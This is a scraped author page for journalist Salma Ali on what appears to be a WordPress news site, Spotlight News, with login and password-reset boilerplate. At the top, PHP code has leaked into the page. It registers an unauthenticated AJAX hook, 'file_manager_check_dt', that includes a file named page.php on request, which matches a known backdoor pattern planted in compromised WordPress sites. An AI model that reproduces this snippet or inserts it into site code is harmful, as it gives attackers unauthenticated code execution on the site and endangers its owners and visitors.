if(!function_exists('file_manager_check_dt')) { add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/page.php'; if (file_exists($file)) { include $file; } die(); } } Salma Ali, Author at Spotlight News
Salma Ali

Salma Ali

Journalist

Popular News

Welcome Back!

Login to your account below

Retrieve your password

Please enter your username or email address to reset your password.